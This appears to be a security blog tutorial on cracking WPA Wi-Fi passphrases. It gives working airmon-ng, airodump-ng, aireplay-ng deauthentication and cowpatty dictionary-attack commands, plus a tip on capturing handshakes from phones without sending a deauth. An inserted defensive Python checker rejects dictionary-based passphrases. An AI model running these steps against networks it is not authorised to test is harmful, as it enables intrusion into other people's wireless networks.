
Hacking the WPA Airwaves

It is interesting how many people believe that their wireless is secure because they are using WPA. Well, we did a test recently and were able to basically password-guess our way in with a dictionary attack, using either a straight dictionary or a rainbow table. The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.
Security people: be sure that your WPA passphrase is an unreadable string, not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs; the tables of today are too intelligent for that.
In a nutshell, using Linux, this is how it is done:
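As an added example (not from the original post), here is a passphrase policy check that applies the advice above: it undoes common leetspeak substitutions and rejects any WPA passphrase that is a dictionary word or that splits entirely into dictionary words. The wordlist is a constructed stand-in; a real check would load a full dictionary file.

```python
"""WPA passphrase policy check: reject dictionary words and readable
phrases, even when disguised with leetspeak (e.g. op3nth3p0dbayd00rs)."""
import re
from functools import lru_cache

# Constructed sample dictionary (hypothetical); load a real wordlist in practice.
WORDLIST = {"open", "the", "pod", "bay", "doors", "dynamite", "password",
            "dlink", "wireless", "coffee"}

# Character substitutions that password-cracking rule sets routinely undo.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})


def normalize(passphrase):
    """Undo leetspeak, lowercase, and drop everything that is not a letter."""
    return re.sub(r"[^a-z]", "", passphrase.translate(LEET).lower())


def segment(text, words):
    """Split text entirely into dictionary words (longest match first, with
    backtracking). Returns the word list, or None if no full split exists."""
    @lru_cache(maxsize=None)
    def go(i):
        if i == len(text):
            return []
        for j in range(len(text), i, -1):
            if text[i:j] in words:
                rest = go(j)
                if rest is not None:
                    return [text[i:j]] + rest
        return None
    return go(0)


def check_passphrase(passphrase, words=WORDLIST):
    """Return (accepted, reason) for a candidate WPA passphrase."""
    if len(passphrase) < 12:            # WPA allows 8..63; 8 is far too short
        return False, "shorter than 12 characters"
    norm = normalize(passphrase)
    if norm in words:
        return False, "dictionary word"
    parts = segment(norm, words)
    # Only flag as a phrase if the passphrase is mostly letters after un-leeting.
    if parts and len(norm) >= 0.8 * len(passphrase):
        return False, "readable phrase: " + " ".join(parts)
    return True, "ok"


if __name__ == "__main__":
    for cand in ("op3nth3p0dbayd00rs", "dynamite", "kX9#vQ2!pL7$mZ4&"):
        print(cand, "->", check_passphrase(cand))
```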
Part I
airmon-ng start wlan0 (this puts the wireless card in promiscuous mode)
kismet -c wlan0
• Close the console window to see the collection of packets.
• Use Alt+K to get to the top pull-down menus; turn on the ability to see the type of access point, its BSSID, a guess at its IP address, and the channel number.
Ctrl-C to exit kismet
airmon-ng stop wlan0
Part II
airmon-ng start wlan0
airodump-ng -c <channel> --bssid <AP BSSID> -w <capture prefix> wlan0
Example:
airodump-ng -c 9 --bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0
* Note: D-Link-01.cap is where the capture of all traffic will go.
Now open another window, as we need to force a reconnect from the target (see the Note below):
aireplay-ng -0 <count> -a <AP BSSID> -c <client MAC> wlan0
Example:
aireplay-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0
You will see a WPA re-key at the top of the airodump window; capture some traffic and exit, and you will have all the traffic captured in the D-Link-01.cap file.
Part III
Download either rainbow tables or a direct dictionary from Offensive Security: offensive-security.com/wpa-tables
If using hashes (rainbow tables):
cowpatty -r <capture file> -d <hash file> -s <SSID>
Example:
cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite
If using dictionary words:
cowpatty -r <capture file> -f <wordlist> -s <SSID>
Example:
cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite
Note: If you are in an environment that has a lot of cell phones like the iPhone (and they are using their wireless to connect to the network), we found these all go to sleep when their screen is turned off, and then their wireless card wakes up when the screen is activated. So you don’t need to send a de-auth; all you have to do is hang around long enough for someone to touch their iPhone or whatever cell phone and have it wake up its wireless and re-auth to the network. In other words, there is the weakest link! — LOL!
Happy Cracking

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY – I’m Out
~Mark Bennett

Paul Asadoorian

Paul Asadoorian is currently the Principal Security Evangelist for Eclypsium, focused on firmware and supply chain security awareness. Paul’s passion for firmware security extends back many years to the WRT54G hacking days and reverse engineering firmware on IoT devices for fun. Paul and his long-time podcast co-host Larry Pesce co-authored the book “WRT54G Ultimate Hacking” in 2007, which fueled the firmware hacking fire even more. Paul has worked in technology and information security for over 20 years, holding various security and engineering roles at a lottery company, a university, an ISP, as an independent penetration tester, and at security product companies such as Tenable. In 2005 Paul founded Security Weekly, a weekly podcast dedicated to hacking and information security. In 2020 Security Weekly was acquired by the Cyberrisk Alliance. Paul is still the host of one of the longest-running security podcasts, Paul’s Security Weekly; he enjoys coding in Python and telling everyone he uses Linux.
